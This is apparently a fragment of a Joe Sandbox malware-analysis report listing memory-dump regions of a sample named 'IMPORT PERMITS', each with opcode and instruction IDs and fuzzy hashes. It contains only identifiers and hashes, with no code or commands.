                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction ID: 400a21e439247139f15b9e20c8cc72ebbd1a85d55a8df9f5bd7d22e39960a4e1
                                                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction Fuzzy Hash: 7151C535D0021AEFEF11DE94C884BAFBBFDAB00718F15422AD611772A0D7309E458BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: caa051cdade1f22edc589594094e4ef774e4443e4d5a69dc73c77e953d87f9e2
                                                                                                                                • Instruction ID: b3eff04c7946a57bae3ab0da712dfdc50fe5826093608c9aa3eccbda84791e0b
                                                                                                                                • Opcode Fuzzy Hash: caa051cdade1f22edc589594094e4ef774e4443e4d5a69dc73c77e953d87f9e2
                                                                                                                                • Instruction Fuzzy Hash: 3E41D5707016029BEB29DB2DC894B7BBB9AEFB4621F86811BF915873A1D730D801C691
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 380fbf571a78ac69c9c2d1f9b2db742d0813c8c7391abc79ce3699809ad913a6
                                                                                                                                • Instruction ID: 01a59d7f371998c29ab32e1836c966a4066aa9c65ebafb25135437f4464e44e6
                                                                                                                                • Opcode Fuzzy Hash: 380fbf571a78ac69c9c2d1f9b2db742d0813c8c7391abc79ce3699809ad913a6
                                                                                                                                • Instruction Fuzzy Hash: 43518B75A01216DFCB20DFA9C9C09AFBBB9FB58318B11451AE589A3314D734ED02CBD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                • Instruction ID: 2dcdddcd3aa3e174234fd8904ee5ea5094aec87eb90fe8708ab94f47a106ae4f
                                                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                • Instruction Fuzzy Hash: 9F4116316007029FCB25CF28C994A6BB7E9FFA0214B56462FEA1287750EB30EC08C790
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4c3f148cec16a480aee4c3e9957bed4e0d047dee5f36f6d8c42dba6eba655c28
                                                                                                                                • Instruction ID: 6c7f0b8a4ce5349b956cc4ed0414d04480e2a533002d6ac2959fc0ad88670269
                                                                                                                                • Opcode Fuzzy Hash: 4c3f148cec16a480aee4c3e9957bed4e0d047dee5f36f6d8c42dba6eba655c28
                                                                                                                                • Instruction Fuzzy Hash: 6741BA36A00219DBDB10DF98C480AEEBBB4BF58710F14812BF915EB364D7349D82CBA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f18356418ea1fed91a2832b5c1732725e1d4e69095bf9ec42cd5e47f48dcfa3d
                                                                                                                                • Instruction ID: 1113db147154eb18dc90672f8cc4c832630602a7a673db7151054d968529bb04
                                                                                                                                • Opcode Fuzzy Hash: f18356418ea1fed91a2832b5c1732725e1d4e69095bf9ec42cd5e47f48dcfa3d
                                                                                                                                • Instruction Fuzzy Hash: A741B2712083029FD725DF29C884A17B7E5FF94218F00483EEA97D3761DB35E4598B50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                • Instruction ID: c5cb4522359708e7f6d896ae8c1236fd37ac030b069cf97432c6ceb593e8946f
                                                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                • Instruction Fuzzy Hash: 0B515F75A00115DFCB55CF98C480AAEFBB2FF85714F2482AAD915A7362D770AE41CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff7e564ed7180b6faa33194eb9b2a4b203dca4c2d1ff8a0567f3557b32921aee
                                                                                                                                • Instruction ID: c866583c9397ab15989fe0fe9b3ad0897c9083d3f72079a07e423c24f97b06f4
                                                                                                                                • Opcode Fuzzy Hash: ff7e564ed7180b6faa33194eb9b2a4b203dca4c2d1ff8a0567f3557b32921aee
                                                                                                                                • Instruction Fuzzy Hash: EC51E9B0901216DBEF258B6CCC05BE9BBF5EF21318F1442AAE529976E1D7349981CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9cd8feb02fd3ee3f144e1ac2f86ca1b805633729d2e84f4ac1face970b26819e
                                                                                                                                • Instruction ID: 160dc1039ad81024d95f9206156e2401b12b0fb41e6dc092519606d666b6e745
                                                                                                                                • Opcode Fuzzy Hash: 9cd8feb02fd3ee3f144e1ac2f86ca1b805633729d2e84f4ac1face970b26819e
                                                                                                                                • Instruction Fuzzy Hash: 1241B331A00329DACF21DF2DC944BEA77B8EF98700F0100AAE908AB291D774DE81CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                • Instruction ID: 640bd1059a1907d72d9a76b94940a3a4db70b5844a68ee76db195ae96757dfb0
                                                                                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                • Instruction Fuzzy Hash: 4E41C675B00107ABEB15DF99CC84ABFBFBAEFA4201F96406AE50497361DA70DD11C760
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 086a284f9c7280e56e0c328876b486ed0e866ed6b1526395c4cea0471cfcf205
                                                                                                                                • Instruction ID: 85300659b8901c94c43f93d26dc25ed7f2b4d01dc78303365f4dcd048048435b
                                                                                                                                • Opcode Fuzzy Hash: 086a284f9c7280e56e0c328876b486ed0e866ed6b1526395c4cea0471cfcf205
                                                                                                                                • Instruction Fuzzy Hash: 0241D371700716DFE729CF28C484A26BBF8FF48318B104A6EF55A87AA0E770E845CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc5c1f6d224eac929194d0b15d9d11cd2c7a861239aab2af616b440f954ec8f0
                                                                                                                                • Instruction ID: 7e8959ed7cb95775480f3aa47727b5bef101315df04c8f4d959de8fd066668cf
                                                                                                                                • Opcode Fuzzy Hash: cc5c1f6d224eac929194d0b15d9d11cd2c7a861239aab2af616b440f954ec8f0
                                                                                                                                • Instruction Fuzzy Hash: BD419E32941205CFDF22DF69D4A4BAE7BB0FB14214F2901AAD415BB2F1DB359941CBA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b10f34211441d9cb3782cbd469fbab6e05e85af79b98b9884cf18030fcbc7294
                                                                                                                                • Instruction ID: f7fa53dc34671a09bd256584ad34f8f3e0cdae725fc265ddcb7e781cc1ff520c
                                                                                                                                • Opcode Fuzzy Hash: b10f34211441d9cb3782cbd469fbab6e05e85af79b98b9884cf18030fcbc7294
                                                                                                                                • Instruction Fuzzy Hash: DD3170716052418FDB20DF2DDA80A2ABBE5FB84720F0A456EF9599B361D730E806CB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 607c61bc33d0ace0c3eba62537d57186bd4dac01138e2f23a187e060e9fb9ba8
                                                                                                                                • Instruction ID: be540ca9065381af4b7f310ce795aee92978038025a4d8ef190c83e7f94de7ab
                                                                                                                                • Opcode Fuzzy Hash: 607c61bc33d0ace0c3eba62537d57186bd4dac01138e2f23a187e060e9fb9ba8
                                                                                                                                • Instruction Fuzzy Hash: 2531A1726016829BF326DB5D8948B26BBD8BB40744F1900A6BF45AB7F3DB38D941C221
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 737438a3018023dc6e1c2816e6fe54798d3821892631cd4104d71b4280f603d4
                                                                                                                                • Instruction ID: 9187b654fb607ac0fc758ac965bd0a82910ea8c7a53cef895cd4e2326de0e9b1
                                                                                                                                • Opcode Fuzzy Hash: 737438a3018023dc6e1c2816e6fe54798d3821892631cd4104d71b4280f603d4
                                                                                                                                • Instruction Fuzzy Hash: 3031F576A00116EBDB15EF98CC40FAEB7B5FB54740F8A416AE900EB254D770ED40CB94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab200537d7617e6a5eb5bd89014e0751a249dd4dc3a2005ffc3b0cc7555756c7
                                                                                                                                • Instruction ID: b7a87786c59e2f4ec43c974f012caf6788ec5468728666b1b61854d41efc1fe5
                                                                                                                                • Opcode Fuzzy Hash: ab200537d7617e6a5eb5bd89014e0751a249dd4dc3a2005ffc3b0cc7555756c7
                                                                                                                                • Instruction Fuzzy Hash: 3C313576A4112DABCF31EF59DC44BDEBBF5AB98350F1500E5E508A7260DA309E91CF90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a00e5811be1049b7a20b5e70d4c7c7d80d5256468e0f928b397e2ac264ff3b3
                                                                                                                                • Instruction ID: 190d9f6accb0793a37c3fc54abbc95c5948ee49037c32dcd6b8e88b0e3ba159e
                                                                                                                                • Opcode Fuzzy Hash: 2a00e5811be1049b7a20b5e70d4c7c7d80d5256468e0f928b397e2ac264ff3b3
                                                                                                                                • Instruction Fuzzy Hash: 6631A872E00615AFDB22DEAEC840B9FBBF8EF54750F014436E556E72A0D2709A018BA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5bc0306d6ac538e228498bb5e1d7f2d77c8ac33fd1a17dbe377b8e88ca3492ec
                                                                                                                                • Instruction ID: fe22342f2d1df84c2c25bf45bc1fcf4fe7c25f3b174c5664564f1d301b419ff6
                                                                                                                                • Opcode Fuzzy Hash: 5bc0306d6ac538e228498bb5e1d7f2d77c8ac33fd1a17dbe377b8e88ca3492ec
                                                                                                                                • Instruction Fuzzy Hash: 1931D671740606EFDB129F5DC850B6BBBB9AF64754F5A007EE605DB361DA30EC018B90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5bcaa546458c8dd1460b80b4a03e2b5882092f80c349e0cd995b0319397f172e
                                                                                                                                • Instruction ID: 848f7651693d9f37e34a7ac6b2cddaf83fd5c4fe031c6a9c7129bd058facb0ea
                                                                                                                                • Opcode Fuzzy Hash: 5bcaa546458c8dd1460b80b4a03e2b5882092f80c349e0cd995b0319397f172e
                                                                                                                                • Instruction Fuzzy Hash: 29310332B04726DBCB16DE688884A6FBFE9AFD4258F01452DFD55A7390DA70DC018BE1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c82c1f51a62135fb1c25c036be1cd0f12337f94b02176d0dbbfcfd79be929f6b
                                                                                                                                • Instruction ID: 25b5485d28ad41b001d8f86b95b04922019ad9954fc2a962eb1db70dd6a0bb4b
                                                                                                                                • Opcode Fuzzy Hash: c82c1f51a62135fb1c25c036be1cd0f12337f94b02176d0dbbfcfd79be929f6b
                                                                                                                                • Instruction Fuzzy Hash: 1A316FB1A053118FE720CF19D844B57BBE5AB98704F0549AEFA84973A1D7B1E844CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                • Instruction ID: 94166b1db08e1cc7ed766b3a7ed79d9217c023dd64d51d355151c4c600db30c1
                                                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                • Instruction Fuzzy Hash: 2A312CB2B01B41AFD761CF69DD40B57BBF8AB08650F14052EA5AAC3761E630E9008B60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 889d59317b06ca32c8d1d2424c274345a41632c62eec1739249a898c0a258f52
                                                                                                                                • Instruction ID: 9900a1d43646b4d71e7e461e0eec1afd807d4a96b6896d832c4a98de6e9253ab
                                                                                                                                • Opcode Fuzzy Hash: 889d59317b06ca32c8d1d2424c274345a41632c62eec1739249a898c0a258f52
                                                                                                                                • Instruction Fuzzy Hash: 0731ACB1909302DFCB11EF1EC54095ABBF1FF89218F0589AEE488AB361D331D945CB92
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 41531a921beaa67d297f2b1fb9d6667fcfb7db35382954b6c96766a4967f5f7a
                                                                                                                                • Instruction ID: 0357840630567a4e8dd9fc558a4047ddc3b27af3325bfb19cf4b10c1cce6424e
                                                                                                                                • Opcode Fuzzy Hash: 41531a921beaa67d297f2b1fb9d6667fcfb7db35382954b6c96766a4967f5f7a
                                                                                                                                • Instruction Fuzzy Hash: D531C431B002469FDB21EFBAC981A6E7BF9EB94304F05853BD609D76A4D730D941CB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                • Instruction ID: 34313ba0de828e1bb46687b58293b78d0b49f201850924027b036afb6a2d5107
                                                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                • Instruction Fuzzy Hash: E9212632E5125BAADB11DBB98801BEFBBB9AF54740F15803AEE55E7350E270D901C7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 23d0a7c2eddb499362acc3b6ff52e8901db431d954a157bd048acd9188ebb781
                                                                                                                                • Instruction ID: 020b0de2c612252c8c7d94a096e94456f924eadb2e53bca4ddca05089d112372
                                                                                                                                • Opcode Fuzzy Hash: 23d0a7c2eddb499362acc3b6ff52e8901db431d954a157bd048acd9188ebb781
                                                                                                                                • Instruction Fuzzy Hash: AF3140719002118BDB31AF6CCC45B6A77B4FF94318F94816EDD499B3A2DB34D986CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ad726358f581601346cf5820f9318667946dc9aaa89a00bd9255bb4dfff337b
                                                                                                                                • Instruction ID: df24e56ef88b364d0df7dd57a4a2b443d8eb2e72369176c0e43ea72c6ffb4275
                                                                                                                                • Opcode Fuzzy Hash: 5ad726358f581601346cf5820f9318667946dc9aaa89a00bd9255bb4dfff337b
                                                                                                                                • Instruction Fuzzy Hash: 77216075601A01EFD7218F69C841F66B7F8FF44250F45882EE5AEC7661DBB0E851CB60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5e013e06c96de1ec604acf123eadb18ff91b8f43fe762b02e3b9c0d7d789ff7a
                                                                                                                                • Instruction ID: aaff316761272d25e6d7540bc32070b578f6c81cf369930baf6bc20af81ffcf5
                                                                                                                                • Opcode Fuzzy Hash: 5e013e06c96de1ec604acf123eadb18ff91b8f43fe762b02e3b9c0d7d789ff7a
                                                                                                                                • Instruction Fuzzy Hash: DB11E372240A05EFE722CB5EC940FDA77A9EF99754F12402AF205DB270DA70EC01C7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ef419f7762ec440abeb3a2b94c43976684c6c7bc85500c0a432fd02a8202ecb
                                                                                                                                • Instruction ID: ca978417a8891c18b1f4f45cd900f3402612778fa6cc6ee8097395db858ab375
                                                                                                                                • Opcode Fuzzy Hash: 7ef419f7762ec440abeb3a2b94c43976684c6c7bc85500c0a432fd02a8202ecb
                                                                                                                                • Instruction Fuzzy Hash: 9E1108723001149FDF1ADB2ECC95A6B7256EBD5374B26493BD9269B3A0EA309812C690
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 90206c7f760b4c9cfc3bf99f6a1cfc1b3e25f3240f5dcb70c22ff036aa7bf538
                                                                                                                                • Instruction ID: 2418c74af8f5e90da3b011a7a4b62eaaa306d046c80ee16f0a051befe167ee66
                                                                                                                                • Opcode Fuzzy Hash: 90206c7f760b4c9cfc3bf99f6a1cfc1b3e25f3240f5dcb70c22ff036aa7bf538
                                                                                                                                • Instruction Fuzzy Hash: 52119176A01205DFCF25DF9DC580A5BBBF4AF94650B07407ED9259B329E6B0DD01CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction ID: 19fa50207183e700bb6d5ef1689747dcf517e918ce61337c37a3864771949d24
                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction Fuzzy Hash: 30110436A00906AFDB19CB59C801B9EBBB9EFA4310F16826AE84597350E631ED01CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction ID: d2d530545af5dea57df4b5cf087ba223b792eb516684159225b6ebeb68a76217
                                                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction Fuzzy Hash: 50119E3A600601EFEB21DF49C844B57BBE9EF55758F05842EEA09AB270DB31DC41DB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
